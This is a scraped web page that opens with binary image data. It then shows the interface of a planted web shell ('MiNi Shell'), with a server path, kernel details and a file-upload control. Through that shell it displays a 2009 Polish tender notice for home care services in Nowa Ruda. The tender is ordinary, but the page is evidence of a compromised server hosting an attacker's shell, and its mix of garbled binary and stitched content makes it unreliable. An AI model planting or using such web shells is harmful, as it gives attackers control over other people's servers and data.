JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090826/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090826/140135-N-2009.html

<p class="kh_header"><b>Nowa Ruda: Usługi opiekuńcze dla podopiecznych Miejskiego Ośrodka Pomocy Społecznej w Nowej Rudzie</b><br>
<b>Numer ogłoszenia: 140135 - 2009; data zamieszczenia: 26.08.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Miejski Ośrodek Pomocy Społecznej , ul. Kolejowa 18, 57-400 Nowa Ruda, woj. dolnośląskie, tel. 074 8721056, faks 074 8721166.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Usługi opiekuńcze dla podopiecznych Miejskiego Ośrodka Pomocy Społecznej w Nowej Rudzie.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiot zamówienia stanowi wykonywanie od 01.11.2009r do 31.10.2012r. usług opiekuńczych  dla podopiecznych Miejskiego Ośrodka Pomocy Społecznej, którzy z powodu wieku, choroby, niepełnosprawności lub innych przyczyn  wymagają pomocy osoby drugiej, a  są jej pozbawieni w ich miejscu zamieszkania.
Szacunkowy zakres przedmiotu zamówienia obejmuje około 75 osób miesięcznie oraz około 1950 roboczogodzin miesięcznie.
Usługi opiekuńcze obejmują pomoc i opiekę w zakresie:
ZAKRES USŁUG OPIEKUŃCZYCH PIELĘGNACYJNYCH
1. Zgłaszanie wizyt lekarskich, badań laboratoryjnych,
2. Pomoc w dotarciu i powrocie do placówki medycznej,
3. Karmienie usługobiorcy,
4. Opieka higieniczno - sanitarna, w tym:
    a) mycie, kąpanie, czesanie, golenie chorego, mycie głowy, obcinanie paznokci,
    b) zmiana bielizny osobistej i pościelowej,
    c) przesłanie łóżka,
    d) pomoc w załatwianiu potrzeb fizjologicznych,
    e) zapobieganie powstawaniu odleżyn i odparzeń,
    f) układanie chorego w łóżku i pomoc przy zmianie pozycji chorego,
    g) pomoc przy ubieraniu.
5. Pielęgnacja zlecona przez lekarza, w tym m.in.:
    a) mierzenie temperatury, rozkładanie leków, podawanie leków drogą doustną,
        doodbytniczą, wziewną ( inhalacje) lub przez skórę ( wcieranie), oklepywanie ,
    b) stosowanie okładów i kompresów,
    c) zmiana opatrunków,
    d) realizacja innych, indywidualnych zaleceń lekarskich,
    e) realizacja recept oraz zakup środków higienicznych niezbędnych
        podopiecznemu.

ZAKRES USŁUG OPIEKUŃCZYCH GOSPODARCZYCH
1.Dokonywanie zakupu artykułów niezbędnych podopiecznemu do codziennej
     egzystencji - razem z nim lub samodzielnie,
2. Przygotowanie posiłków z uwzględnieniem diety zleconej przez lekarza,
3. Dostarczanie posiłków do mieszkań usługobiorców ze wskazanego lokalu
    gastronomicznego, 
4. Podgrzanie, podanie i pomoc przy spożywaniu posiłków,
5. Utrzymywanie w czystości naczyń stołowych i kuchennych oraz sprzętu
    gospodarstwa domowego,
6. Współpraca z lekarzem i pielęgniarką środowiskową oraz pracownikiem socjalnym,
7. Wychodzenie z chorym podopiecznym na spacer,
8. Bieżące sprzątanie pokoju oraz pomieszczeń użytkowych usługobiorcy (wytarcie
    kurzu, odkurzenie, mycie podłogi, mycie sprzętu AGD- lodówki i kuchni),
    codzienne wietrzenie pomieszczeń,
9. Generalne okresowe sprzątanie używanej części mieszkania usługobiorcy w tym :
     mycie okien,  drzwi, podłóg, glazury, oświetleń, szafek kuchennych i czyszczenie
     mebli (od  zewnątrz i wewnątrz), pastowanie i froterowanie podłóg, pranie,
     sprzątanie  łazienki, prasowanie i zawieszanie firanek i zasłon, trzepanie i pranie
     chodników, trzepanie i pranie dywanów itp.,
10. Wynoszenie śmieci,
11. Palenie w piecu, przynoszenie węgla i wody,
      12. Pranie bielizny osobistej usługobiorcy,
13. Prasowanie,
14. Załatwianie spraw urzędowych (poczta, administracja, bank itp.),
15. Zgłaszanie napraw urządzeń domowych,
16  Utrzymanie w czystości sprzętu sanitarnego i urządzeń sanitarnych ( miednicy,
      kaczki, basenu, wanny, umywalki, nocnika, sedesu ),
17. Prowadzenie na bieżąco zeszytu wydatków i rozliczeń wydanych pieniędzy
     podopiecznego codziennie lub w terminach ustalonych,
18. Realizacja innych indywidualnych potrzeb podopiecznego - zleconych przez
     Ośrodek, np. :
     a) umożliwienie dotarcia podopiecznemu do  szpitala, ośrodka zdrowia lub domu 
         pomocy społecznej przy użyciu własnego lub ogólnie dostępnego środka   
         transportu,
     b) asystowanie i pomoc w dotarciu na cmentarz - grób najbliższych w związku 
         ze Świętem Zmarłych itp.,
     c) dowiezienie/powrót do placówki rehabilitacyjnej przy użyciu własnego lub  
         ogólnie dostępnego środka transportu.
Wykonawca zobowiązany jest do comiesięcznego pobierania od usługobiorcy obowiązkowej odpłatności za usługi opiekuńcze zgodnie z decyzją i odprowadzanie jej na konto Zamawiającego.

W razie zgonu podopiecznego Wykonawca zobowiązany jest do:
 1. wezwania lekarza celem stwierdzenia zgonu.
 2. wezwania dozorcy domu lub najbliższego sąsiada.
 3. zawiadomienia rodziny.
 4. zawiadomienia MOPS .
Usługi opiekuńcze świadczone będą w oparciu o decyzję administracyjną, która określi:
- miejsce realizacji usług,
- czas ich trwania,
- zasady odpłatności za zrealizowane usługi,
- zakres czynności do wykonania..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 85.00.00.00-9.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 36.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
<p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> Zamawiający określa poniższe warunki udziału w postępowaniu, które muszą spełnić wykonawcy ubiegający się o udzielenie zamówienia:

1.posiadają uprawnienia do wykonywania określonej działalności lub czynności;

2.posiadają niezbędną wiedzę i doświadczenie oraz dysponują potencjałem technicznym i osobami zdolnymi do wykonania zamówienia. niekaralnymi, posiadającymi minimum wykształcenie podstawowe. Zamawiający wymaga, aby co najmniej 20% osób posiadało wykształcenie średnie medyczne lub policealne w zakresie opieki medycznej środowiskowej. 
3.znajdują się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia :posiadają Polisę lub inny dokument ubezpieczenia potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności gospodarczej na kwotę nie niższą niż wartość ofertowa brutto
3.nie podlegają wykluczeniu z postępowania o udzielenie zamówienia [art. 22 ust. 1 pkt 4) ustawy].
4.akceptują warunki umowy stanowiącej  załącznik do SIWZ .   Przyjęcie przez Wykonawcę postanowień umowy stanowi jeden z warunków ważności oferty.
Zamawiający dokona oceny spełniania warunków udziału w postępowaniu w sposób spełnia / nie spełnia..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> Zamawiający żąda od wykonawców  oświadczeń i dokumentów (w formie oryginału lub kserokopii potwierdzonej za zgodność z oryginałem przez osobę upoważnioną do reprezentowania wykonawcy) w celu potwierdzenia spełniania warunków udziału w postępowaniu. Wykaz oświadczeń i dokumentów, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu przedstawiono poniżej:
1.Warunek posiadania uprawnień do wykonywania określonej działalności lub   czynności:
Aktualny odpis z właściwego rejestru albo zaświadczenie o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert.
2.Warunek posiadania niezbędnej wiedzy i doświadczenia oraz potencjału    technicznego, a także dysponowania osobami zdolnymi do wykonania zamówienia:
  a) Oświadczenie Wykonawcy, mówiące o tym, że dysponuje potencjałem technicznym i osobami zdolnymi do wykonania zamówienia, niekaralnymi, posiadającymi minimum wykształcenie podstawowe, a  co najmniej 20% osób posiada wykształcenie średnie medyczne lub policealne w zakresie opieki medycznej środowiskowej. 
b) Wykaz zrealizowanych dla co najmniej 50 podopiecznych, minimum 3 zamówień  o wartości porównywalnej z przedmiotem zamówienia wykonywanego w ciągu ostatnich trzech lat przed wszczęciem niniejszego postępowania, a jeśli okres działalności był krótszy - w tym okresie - wraz z dokumentami potwierdzającymi należyte wykonanie powierzonych zamówień (np. referencje od poprzednich zamawiających) 
3.Warunek znajdowania się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia:
 a)Polisa lub inny dokument ubezpieczenia potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności gospodarczej  na kwotę nie niższą niż wartość ofertowa brutto.
b)aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że Wykonawca nie zalega z opłacaniem podatków i opłat, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymania w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem
terminu składania ofert
c) aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych
lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że Wykonawca
nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne lub
zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub
rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania
decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed
upływem terminu  składania ofert
4.Warunek nie podlegania wykluczeniu z postępowania o udzielenie zamówienia:
Oświadczenie o spełnianiu warunków art. 22 ust. 1 ustawy Prawo zamówień publicznych;
UWAGA:
Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia [art. 23 ust. 1 ustawy]. W takim przypadku, zamawiający żąda potwierdzenia spełniania warunków udziału w postępowaniu łącznie przez wykonawców składających ofertę - dotyczy warunków nr: 2 i 3. Dla warunków nr 1 i 4 osobno dla każdego z wykonawców, którzy wspólnie ubiegają się o udzielenie zamówienia. 
Jeżeli Wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, zamiast dokumentów, o których mowa w pkt 1 lit. a, składa dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania, potwierdzający, że nie otwarto wobec niego likwidacji ani nie ogłoszono upadłości, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert. 
Jeżeli w kraju pochodzenia osoby lub w kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania nie wydaje się w/w dokumentu, zastępuje się go dokumentem zawierającym oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo  organem samorządu zawodowego lub gospodarczego odpowiednio kraju pochodzenia osoby lub kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p><ul class="kh_indent_1"><br>
<li>1 - Cena - 80</li>
<li>2 - Doświadczenie - 20</li>
</ul><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.um.nowaruda.bip.info.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Miejski Ośrodek Pomocy Społecznej ul. Kolejowa 18, 57-400 Nowa Ruda.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 07.09.2009 godzina 12:00, miejsce: Miejski Ośrodek Pomocy Społecznej ul. Kolejowa 18, 57-400 Nowa Ruda , nr lokalu 202 (sekretariat).</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com